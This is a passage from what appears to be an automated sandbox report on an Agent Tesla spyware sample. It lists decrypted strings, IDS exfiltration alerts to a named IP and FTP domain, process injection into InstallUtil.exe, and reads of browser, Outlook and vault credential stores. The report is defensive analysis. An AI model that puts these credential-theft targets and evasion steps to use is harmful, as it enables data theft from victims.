                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: passwd
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ProgramFiles
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: passwd2
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: passwd
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: wva4mZuUb4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: wva4mZuUb4.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.7:49846 -> 162.241.203.30:44938
                        Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.7:49835 -> 162.241.203.30:21
                        Source: global trafficTCP traffic: 192.168.2.7:49846 -> 162.241.203.30:44938
                        Source: Joe Sandbox ViewIP Address: 162.241.203.30 162.241.203.30
                        Source: Joe Sandbox ViewIP Address: 162.241.203.30 162.241.203.30
                        Source: Joe Sandbox ViewASN Name: OIS1US OIS1US
                        Source: unknownFTP traffic detected: 162.241.203.30:21 -> 192.168.2.7:49835 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 150 allowed.220-Local time is now 13:29. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 150 allowed.220-Local time is now 13:29. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 150 allowed.220-Local time is now 13:29. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: ftp.aminhacorretora.com.br
                        Source: InstallUtil.exe, 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aminhacorretora.com.br
                        Source: InstallUtil.exe, 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.aminhacorretora.com.br
                        Source: InstallUtil.exe, 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F0BC58 CreateProcessAsUserW,0_2_08F0BC58
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_00F408B80_2_00F408B8
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_00F412180_2_00F41218
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_013783880_2_01378388
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_0137147E0_2_0137147E
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_01371B080_2_01371B08
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_01377D600_2_01377D60
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_014EF3D10_2_014EF3D1
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_014EF3E00_2_014EF3E0
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_014ED5EC0_2_014ED5EC
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_062706E00_2_062706E0
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_06274A580_2_06274A58
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_077A45600_2_077A4560
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_077A00400_2_077A0040
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_077A00070_2_077A0007
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_0780D7800_2_0780D780
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_0780EFF80_2_0780EFF8
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_0780CF080_2_0780CF08
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_0780BEEB0_2_0780BEEB
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_0780AE530_2_0780AE53
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_07808DB80_2_07808DB8
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_0780E1480_2_0780E148
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_0780401E0_2_0780401E
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_07802F800_2_07802F80
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_0780CECF0_2_0780CECF
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F018200_2_08F01820
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F0C1D80_2_08F0C1D8
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F06D700_2_08F06D70
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F066200_2_08F06620
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F04B500_2_08F04B50
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F000400_2_08F00040
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F018100_2_08F01810
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F000130_2_08F00013
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F014000_2_08F01400
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F011C80_2_08F011C8
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F09DB00_2_08F09DB0
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F011B90_2_08F011B9
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F0A5180_2_08F0A518
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F08A700_2_08F08A70
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F016780_2_08F01678
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F08A600_2_08F08A60
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F016680_2_08F01668
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F00E100_2_08F00E10
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F0661B0_2_08F0661B
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F013F00_2_08F013F0
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F023D00_2_08F023D0
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F05B680_2_08F05B68
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F05B580_2_08F05B58
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F04B400_2_08F04B40
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F00B200_2_08F00B20
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F023210_2_08F02321
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_08F00B100_2_08F00B10
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_077A45350_2_077A4535
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_02C140F010_2_02C140F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_02C14D0810_2_02C14D08
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_02C1443810_2_02C14438
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_06631CB010_2_06631CB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0663682010_2_06636820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0663383810_2_06633838
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0666F64810_2_0666F648
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0666874010_2_06668740
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_06667FC010_2_06667FC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0666E26810_2_0666E268
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_06664AB010_2_06664AB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_066653D010_2_066653D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0666900010_2_06669000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0666A92810_2_0666A928
                        Source: wva4mZuUb4.exe, 00000000.00000002.1907192370.000000000113E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs wva4mZuUb4.exe
                        Source: wva4mZuUb4.exe, 00000000.00000002.1921308010.0000000003FF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs wva4mZuUb4.exe
                        Source: wva4mZuUb4.exe, 00000000.00000002.1921308010.0000000003F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs wva4mZuUb4.exe
                        Source: wva4mZuUb4.exe, 00000000.00000000.1238731347.000000000067E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuy6ij.exe@ vs wva4mZuUb4.exe
                        Source: wva4mZuUb4.exe, 00000000.00000002.1922738564.00000000055F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs wva4mZuUb4.exe
                        Source: wva4mZuUb4.exe, 00000000.00000002.1928252547.0000000007BF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll6 vs wva4mZuUb4.exe
                        Source: wva4mZuUb4.exe, 00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs wva4mZuUb4.exe
                        Source: wva4mZuUb4.exe, 00000000.00000002.1909018822.0000000003206000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs wva4mZuUb4.exe
                        Source: wva4mZuUb4.exeBinary or memory string: OriginalFilenameuy6ij.exe@ vs wva4mZuUb4.exe
                        Source: wva4mZuUb4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: wva4mZuUb4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: wva4mZuUb4.exe, s2W4J.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@1/1
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wva4mZuUb4.exe.logJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                        Source: wva4mZuUb4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: wva4mZuUb4.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: wva4mZuUb4.exeReversingLabs: Detection: 71%
                        Source: unknownProcess created: C:\Users\user\Desktop\wva4mZuUb4.exe "C:\Users\user\Desktop\wva4mZuUb4.exe"
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: wva4mZuUb4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: wva4mZuUb4.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        barindex
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.55f0000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.55f0000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1922738564.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1909018822.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: wva4mZuUb4.exe PID: 7312, type: MEMORYSTR
                        Source: wva4mZuUb4.exe, b8E.cs.Net Code: NewLateBinding.LateCall(obj7, (Type)null, "DynamicInvoke", new object[1] { new object[0] }, (string[])null, (Type[])null, (bool[])null, true)
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_01378AB0 push eax; iretd 0_2_01379039
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_014EC409 push eax; retf 0_2_014EC40A
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_014E5049 push esp; retf 0_2_014E504A
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_0627D44F push ecx; retf EFCDh0_2_0627D5BA
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_077A3733 push FFFFFFE9h; retn 0001h0_2_077A3735
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_077AA1A9 push ecx; retf 0046h0_2_077AA1CA
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_077AD07C pushad ; retf 0_2_077AD0D5
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_077AF21F push eax; iretd 0_2_077AF22E
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_0780A3ED push ds; retf 0040h0_2_0780A43E
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_07807733 push edi; ret 0_2_0780792E
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_078081F1 push es; ret 0_2_07808200
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeCode function: 0_2_0780793C push eax; ret 0_2_0780796D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_06661ED0 push es; ret 10_2_06661EE0
                        Source: wva4mZuUb4.exeStatic PE information: section name: .text entropy: 7.176062278190911
                        Source: wva4mZuUb4.exe, Aj8s9.csHigh entropy of concatenated method names: 'b6PCx', 'Xa0y5', 'j8L4Z', 'z8QAb', 'c0B6M', 'Gz5c8', 'Xf9j7', 'Hg03N', 'Tx5j8', 'Bf60Y'
                        Source: wva4mZuUb4.exe, s2W4J.csHigh entropy of concatenated method names: 'g9DHn', 'Lf07P', 'i1Q7A', 'i4KQf', 'q0MQe', 'z4GEp', 'Mx73X', 'Jo3t8', 'y7YAs', 'Bw8r1'
                        Source: wva4mZuUb4.exe, z8P.csHigh entropy of concatenated method names: 'j7QCd', 'Rx15T', 'Zq70P', 'Ai7y4', 'q4HKc', 'w5YPf', 'Dz6q1', 'Tj2q5', 'Ea31M', 'Ls26C'
                        Source: wva4mZuUb4.exe, Kx30R.csHigh entropy of concatenated method names: 'Ww38S', 'Ny95P', 'Zp31W', 'Zx29R', 'Xe05M', 'r7H5A', 'Ka9t5', 'Xw4y3', 't9XLn', 'y5X0N'

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeFile opened: C:\Users\user\Desktop\wva4mZuUb4.exe\:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
